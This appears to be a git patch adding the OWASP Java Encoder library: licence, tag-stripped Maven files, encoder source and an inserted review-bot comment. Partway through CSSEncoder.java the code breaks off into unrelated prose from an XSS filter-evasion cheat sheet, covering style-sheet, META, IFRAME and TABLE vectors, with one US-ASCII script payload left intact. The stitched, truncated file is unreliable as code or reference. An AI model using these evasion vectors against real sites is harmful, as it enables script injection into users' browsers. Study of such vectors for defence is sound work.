From 5b28a40851d65b54b33638b9aad3015a5f53533e Mon Sep 17 00:00:00 2001 
From: Jim Manico Date: Sun, 29 Mar 2015 14:14:11 -1000 Subject: initial move from google code --- COPYING | 33 + checkstyle.xml | 202 + core/pom.xml | 273 ++ .../src/main/java/org/owasp/encoder/ASCIIBits.java | 124 + .../main/java/org/owasp/encoder/CDATAEncoder.java | 314 ++ .../main/java/org/owasp/encoder/CSSEncoder.java | 299 ++ .../java/org/owasp/encoder/ChainedEncoder.java | 164 + core/src/main/java/org/owasp/encoder/Encode.java | 1402 ++++++ .../main/java/org/owasp/encoder/EncodedWriter.java | 232 + core/src/main/java/org/owasp/encoder/Encoder.java | 264 ++ core/src/main/java/org/owasp/encoder/Encoders.java | 201 + .../main/java/org/owasp/encoder/HTMLEncoder.java | 345 ++ .../main/java/org/owasp/encoder/JavaEncoder.java | 210 + .../java/org/owasp/encoder/JavaScriptEncoder.java | 305 ++ .../main/java/org/owasp/encoder/URIEncoder.java | 397 ++ core/src/main/java/org/owasp/encoder/Unicode.java | 84 + .../owasp/encoder/UnsupportedContextException.java | 53 + .../java/org/owasp/encoder/XMLCommentEncoder.java | 248 + .../main/java/org/owasp/encoder/XMLEncoder.java | 406 ++ .../test/java/org/owasp/encoder/BenchmarkTest.java | 260 ++ .../java/org/owasp/encoder/CDATAEncoderTest.java | 99 + .../java/org/owasp/encoder/CSSEncoderTest.java | 90 + .../java/org/owasp/encoder/ChainedEncoderTest.java | 72 + .../test/java/org/owasp/encoder/EncodeTest.java | 160 + .../org/owasp/encoder/EncoderTestSuiteBuilder.java | 562 +++ .../test/java/org/owasp/encoder/EncodersTest.java | 73 + .../java/org/owasp/encoder/HTMLEncoderTest.java | 104 + .../java/org/owasp/encoder/JavaEncoderTest.java | 76 + .../org/owasp/encoder/JavaScriptEncoderTest.java | 126 + .../java/org/owasp/encoder/URIEncoderTest.java | 130 + .../org/owasp/encoder/XMLCommentEncoderTest.java | 101 + .../java/org/owasp/encoder/XMLEncoderTest.java | 138 + .../org/owasp/encoder/benchmark-data-1.txt | 427 ++ .../org/owasp/encoder/benchmark-data-2.txt | 4921 ++++++++++++++++++++ esapi/pom.xml | 224 + 
.../java/org/owasp/encoder/esapi/ESAPIEncoder.java | 240 + .../org/owasp/encoder/esapi/ESAPIEncoderTest.java | 49 + esapi/src/test/resources/.esapi/ESAPI.properties | 1 + jsp/pom.xml | 243 + .../java/org/owasp/encoder/tag/EncodingTag.java | 57 + .../java/org/owasp/encoder/tag/ForCDATATag.java | 52 + .../org/owasp/encoder/tag/ForCssStringTag.java | 52 + .../java/org/owasp/encoder/tag/ForCssUrlTag.java | 52 + .../org/owasp/encoder/tag/ForHtmlAttributeTag.java | 52 + .../org/owasp/encoder/tag/ForHtmlContentTag.java | 52 + .../java/org/owasp/encoder/tag/ForHtmlTag.java | 52 + .../encoder/tag/ForHtmlUnquotedAttributeTag.java | 52 + .../encoder/tag/ForJavaScriptAttributeTag.java | 52 + .../owasp/encoder/tag/ForJavaScriptBlockTag.java | 52 + .../owasp/encoder/tag/ForJavaScriptSourceTag.java | 52 + .../org/owasp/encoder/tag/ForJavaScriptTag.java | 52 + .../org/owasp/encoder/tag/ForUriComponentTag.java | 53 + .../main/java/org/owasp/encoder/tag/ForUriTag.java | 52 + .../org/owasp/encoder/tag/ForXmlAttributeTag.java | 52 + .../org/owasp/encoder/tag/ForXmlCommentTag.java | 52 + .../org/owasp/encoder/tag/ForXmlContentTag.java | 52 + .../main/java/org/owasp/encoder/tag/ForXmlTag.java | 52 + .../resources/META-INF/java-encoder-advanced.tld | 560 +++ jsp/src/main/resources/META-INF/java-encoder.tld | 403 ++ .../org/owasp/encoder/tag/EncodingTagTest.java | 77 + .../org/owasp/encoder/tag/ForCDATATagTest.java | 77 + .../org/owasp/encoder/tag/ForCssStringTagTest.java | 77 + .../org/owasp/encoder/tag/ForCssUrlTagTest.java | 77 + .../owasp/encoder/tag/ForHtmlAttributeTagTest.java | 77 + .../owasp/encoder/tag/ForHtmlContentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForHtmlTagTest.java | 77 + .../tag/ForHtmlUnquotedAttributeTagTest.java | 77 + .../encoder/tag/ForJavaScriptAttributeTagTest.java | 77 + .../encoder/tag/ForJavaScriptBlockTagTest.java | 77 + .../encoder/tag/ForJavaScriptSourceTagTest.java | 77 + .../owasp/encoder/tag/ForJavaScriptTagTest.java | 46 + 
.../owasp/encoder/tag/ForUriComponentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForUriTagTest.java | 77 + .../owasp/encoder/tag/ForXmlAttributeTagTest.java | 77 + .../owasp/encoder/tag/ForXmlCommentTagTest.java | 77 + .../owasp/encoder/tag/ForXmlContentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForXmlTagTest.java | 77 + pom.xml | 126 + 78 files changed, 17038 insertions(+) create mode 100644 COPYING create mode 100644 checkstyle.xml create mode 100644 core/pom.xml create mode 100644 core/src/main/java/org/owasp/encoder/ASCIIBits.java create mode 100644 core/src/main/java/org/owasp/encoder/CDATAEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/CSSEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/ChainedEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Encode.java create mode 100644 core/src/main/java/org/owasp/encoder/EncodedWriter.java create mode 100644 core/src/main/java/org/owasp/encoder/Encoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Encoders.java create mode 100644 core/src/main/java/org/owasp/encoder/HTMLEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/JavaEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/URIEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Unicode.java create mode 100644 core/src/main/java/org/owasp/encoder/UnsupportedContextException.java create mode 100644 core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/XMLEncoder.java create mode 100644 core/src/test/java/org/owasp/encoder/BenchmarkTest.java create mode 100644 core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/CSSEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/ChainedEncoderTest.java create mode 100644 
core/src/test/java/org/owasp/encoder/EncodeTest.java create mode 100644 core/src/test/java/org/owasp/encoder/EncoderTestSuiteBuilder.java create mode 100644 core/src/test/java/org/owasp/encoder/EncodersTest.java create mode 100644 core/src/test/java/org/owasp/encoder/HTMLEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/JavaEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/JavaScriptEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/URIEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/XMLCommentEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/XMLEncoderTest.java create mode 100644 core/src/test/resources/org/owasp/encoder/benchmark-data-1.txt create mode 100644 core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt create mode 100644 esapi/pom.xml create mode 100644 esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java create mode 100644 esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java create mode 100644 esapi/src/test/resources/.esapi/ESAPI.properties create mode 100644 jsp/pom.xml create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java create mode 100644 
jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java create mode 100644 jsp/src/main/resources/META-INF/java-encoder-advanced.tld create mode 100644 jsp/src/main/resources/META-INF/java-encoder.tld create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java create mode 100644 
jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlContentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlTagTest.java create mode 100755 pom.xml diff --git a/COPYING b/COPYING new file mode 100644 index 0000000..51d2e0e --- /dev/null +++ b/COPYING 
@@ -0,0 +1,33 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/checkstyle.xml b/checkstyle.xml
new file mode 100644
index 0000000..530c5a9
--- /dev/null
+++ b/checkstyle.xml
@@ -0,0 +1,202 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/core/pom.xml b/core/pom.xml new file mode 100644 index 0000000..917768b --- /dev/null +++ b/core/pom.xml 
@@ -0,0 +1,273 @@ + + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2-SNAPSHOT + + + encoder + 1.2-SNAPSHOT + jar + + OWASP Encoders + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + + + org.apache.maven.plugins + maven-surefire-plugin + 2.12 + + + org/owasp/encoder/BenchmarkTest.java + + + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.2 + + + 85 + 85 + false + 85 + 85 + 85 + 85 + + + + + + clean + + + + + + org.apache.maven.plugins + maven-source-plugin + 2.2.1 + + + attach-sources + package + + jar + + + + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.9 + + + attach-javadocs + package + + jar + + + + + + org.apache.maven.plugins + maven-site-plugin + 3.2 + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.6 + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + 1.3.1 + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + 2.3 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.12.4 + + + + report-only + failsafe-report-only + + + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.1 + + + org.apache.maven.plugins + maven-pmd-plugin + 2.7.1 + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.9 + + + default + + javadoc + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + 2.9.1 + + ../checkstyle.xml + basedir=${basedir}/.. 
+ + + + org.codehaus.mojo + findbugs-maven-plugin + 2.5.2 + + + + + + + + + + + junit + junit + 3.8.1 + test + + + + + + benchmark + + + + org.apache.maven.plugins + maven-failsafe-plugin + 2.12.4 + + + org/owasp/encoder/BenchmarkTest.java + + + + + + integration-test + verify + + + + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + + diff --git a/core/src/main/java/org/owasp/encoder/ASCIIBits.java b/core/src/main/java/org/owasp/encoder/ASCIIBits.java new file mode 100644 index 0000000..33a3a33 --- /dev/null +++ b/core/src/main/java/org/owasp/encoder/ASCIIBits.java 
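Review bot: The maven-gpg-plugin declared in the sign-artifacts profile near the end of this hunk carries no version, while every other plugin in the file (surefire 2.12, cobertura 2.5.2, source 2.2.1, javadoc 2.9, checkstyle 2.9.1, findbugs 2.5.2, failsafe 2.12.4) is pinned; as far as the tag-stripped text shows, release signing would resolve to whatever plugin version Maven picks at build time, so pin it with an explicit `<version>` element like the others. The cobertura-maven-plugin appears twice with different versions, 2.5.2 in the build plugins and 2.5.1 in the reporting section, which means two resolutions of the same tool and should be aligned to one version. The only test dependency is `junit` `3.8.1`, an old, unmaintained line; since these tests are the regression guard for an output-encoding library, upgrading to a maintained JUnit release is worth a follow-up.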
@@ -0,0 +1,124 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder;
+
+/**
+ * ASCIIBits - Small helper class for building up 128-bit bit-mask (2 longs)
+ * to be used testing lower-ASCII characters. It helps make some other code
+ * easier to read. It is not intended to be public.
+ */
+class ASCIIBits {
+ /** Lower 64 bits. */
+ long _lowerMask;
+ /** Upper 64 bits. 
*/ + long _upperMask; + + /** + * Sets a bit to 1 for each character in the argument string. No checking + * is performed to see if characters are in the valid range 0..127. + * + * @param chars the characters to set to 1. + * @return {@code this} + */ + ASCIIBits set(String chars) { + for (int i=0, n=chars.length() ; i". This encoder removes invalid XML + * characters, and encodes "]]>" (to "]]>]]<![CDATA[>"). The result is + * that the data integrity is maintained, but the code receiving the output + * will have to handle multiple CDATA events with character events between. + * As an alternate approach, the caller could pre-encode "]]>" to something + * of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use + * this encoder to remove any invalid XML characters. + * + * @author Jeff Ichnowski + */ +class CDATAEncoder extends Encoder { + + /** The encoding of @{code "]]>"}. */ + private static final char[] CDATA_END_ENCODED = + "]]>]]".toCharArray(); + + /** Length of {@code "]]>]]"}. */ + private static final int CDATA_END_ENCODED_LENGTH = 15; + + /** Length of {@code "]]>"}. */ + private static final int CDATA_END_LENGTH = 3; + + @Override + protected int maxEncodedLength(int n) { + // "]" becomes "]" (1 -> 1) + // "]]" becomes "]]" (2 -> 2) + // "]]>" becomes "]]>]]" (3 -> 15) + // "]]>]" becomes "]]>]]]" (3 -> 15 + 1 -> 1) + // ... + + int worstCase = n / CDATA_END_LENGTH; + int remainder = n % CDATA_END_LENGTH; + + return worstCase * CDATA_END_ENCODED_LENGTH + remainder; + +// return (n - remainder) * 5 + remainder; + } + + @Override + protected int firstEncodedOffset(String input, int off, int len) { + final int n = off + len; + int closeCount = 0; + for (int i=off ; i= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { + // valid + } else { + return i; + } + } else { + if (i+1 < n) { + if (input.charAt(i+1) != ']') { + // "]x" (next character is safe for this to be ']') + } else { + // "]]?" 
+ // keep looping through ']' + for ( ; i+2 < n && input.charAt(i+2) == ']' ; ++i) { + // valid + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i+2 < n) { + if (input.charAt(i+2) == '>') { + return i; + } else { + // valid + } + } else { + return n; + } + } + } else { + return n; + } + } + } else if (ch < Character.MIN_HIGH_SURROGATE) { + if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { + // valid + } else { + return i; + } + } else if (ch <= Character.MAX_HIGH_SURROGATE) { + if (i+1 < n) { + if (Character.isLowSurrogate(input.charAt(i+1))) { + int cp = Character.toCodePoint(ch, input.charAt(i+1)); + if (Unicode.isNonCharacter(cp)) { + return i; + } else { + ++i; + // valid pair + } + } else { + return i; + } + } else { + // end of input, high without low = invalid + return i; + } + } else if ( + // low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE || + // non characters + ch > '\ufffd' || + ('\ufdd0' <= ch && ch <= '\ufdef')) + { + return i; + } else { + // valid + } + + } + return n; + } + + @Override + protected CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { + final char[] in = input.array(); + final char[] out = output.array(); + int i = input.arrayOffset() + input.position(); + final int n = input.arrayOffset() + input.limit(); + int j = output.arrayOffset() + output.position(); + final int m = output.arrayOffset() + output.limit(); + + for ( ; i= m) { + return overflow(input, i, output, j); + } + if (ch >= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { + out[j++] = ch; + } else { + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else { + if (i+1 < n) { + if (in[i+1] != ']') { + // "]x" (next character is safe for this to be ']') + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } else { + // "]]?" 
+ // keep looping through ']' + for ( ; i+2 < n && in[i+2] == ']' ; ++i) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i+2 < n) { + if (in[i+2] == '>') { + if (j+CDATA_END_ENCODED_LENGTH > m) { + return overflow(input, i, output, j); + } + System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); + j += CDATA_END_ENCODED_LENGTH; + i += 2; + } else { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } + } else if (endOfInput) { + if (j+2 > m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + out[j++] = ']'; + i = n; + break; + } else { + break; + } + } + } else if (endOfInput) { + // seen "]", then end of input. + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + i++; + break; + } else { + break; + } + } + } else if (ch < Character.MIN_HIGH_SURROGATE) { + if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + } else { + // C1 control code + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (ch <= Character.MAX_HIGH_SURROGATE) { + if (i+1 < n) { + if (Character.isLowSurrogate(in[i+1])) { + int cp = Character.toCodePoint(ch, in[i+1]); + if (Unicode.isNonCharacter(cp)) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + ++i; + } else { + if (j+1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + out[j++] = in[++i]; + } + } else { + // high without low + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (endOfInput) { + // end of input, high without low = invalid + if (j >= m) { + return 
overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } else { + break; + } + } else if ( + // low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE || + // non characters + ch > '\ufffd' || + ('\ufdd0' <= ch && ch <= '\ufdef')) + { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } else { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + } + + } + + return underflow(input, i, output, j); + } + + @Override + public String toString() { + return "CDATAEncoder"; + } +} diff --git a/core/src/main/java/org/owasp/encoder/CSSEncoder.java b/core/src/main/java/org/owasp/encoder/CSSEncoder.java new file mode 100644 index 0000000..00ea4c0 --- /dev/null +++ b/core/src/main/java/org/owasp/encoder/CSSEncoder.java 
@@ -0,0 +1,299 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder;
+
+import java.nio.CharBuffer;
+import java.nio.charset.CoderResult;
+
+/**
+ * CSSEncoder -- Encoder for Cascading-Style-Sheet string and URI contexts.
+ * Other contexts, such as color, number (w/unit), etc... are not good targets
+ * for "encoding" (e.g. 
you cannot encode the string "XYZ" into a number), + * they should instead by validated through other means (such as regular + * expressions). + */ +class CSSEncoder extends Encoder { + + /** Number of bits in a {@code long}. */ + static final int LONG_BITS = 64; + + /** Length of hex encoding with trailing space {@code "\## "}. */ + static final int HEX_ENCODED_LENGTH = 4; + + /** + * Encoding mode of operation--specified the set of characters that + * required encoding. + */ + static enum Mode { + /** + * String contexts. Characters between quotes. + * + *
+         *   Not allowed: \n \r \f \\ " '  (everything else is allowed)
+         *   Allows: "\\{nl}" (escaped newline)
+         * 
+ */ + STRING(new ASCIIBits().set(' ', '~').clear("\"\'<&/\\>")), + + /** + * URL context. Characters inside a "url(...)". + * + *
+         *   Allowed: [!#$%&*-\[\]-~]|{nonascii}|{escape}
+         *   Escapes: \\[0-9a-f]{1,6}(\s?)
+         *            \\[^\n\r\f0-9a-f]
+         * 
+ */ + URL(new ASCIIBits().set("!#$%").set('*', '[').set(']', '~').clear("/<>")), + + // In both contexts above '<' is added to protect embedded tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world: + +Remote style sheet part 3 +. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to +RFC2616 +setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: ; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox: + +Remote style sheet part 4 +. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites: + +Local htc file +. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute: + +List-style-image +. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector: +
  • XSS +VBscript +in an image: + +Mocha +(older versions of Netscape only): + +Livescript + +US-ASCII +encoding (found by +Kurt Huwig +). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at +my charsets issues +page: +¼script¾alert(¢XSS¢)¼/script¾ +META +(the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs): + +META using data: directive +URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see +RFC 2397 +for more details or go +or +to encode your own. You can also use the +below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method: + +META with additional URL parameter +. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by +Moritz Naumann +): + +IFRAME +(if iframes are allowed there are a lot of other XSS problems as well): + +FRAME +(frames have the same sorts of XSS problems as iframes): + +TABLE +(who would have thought tables were XSS targets... except me, of course): + +TD +(just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors): +
    +DIV background-image +
    +DIV background-image with unicoded XSS +exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by +Renaud Lifchitz +as a vulnerability in Hotmail: +
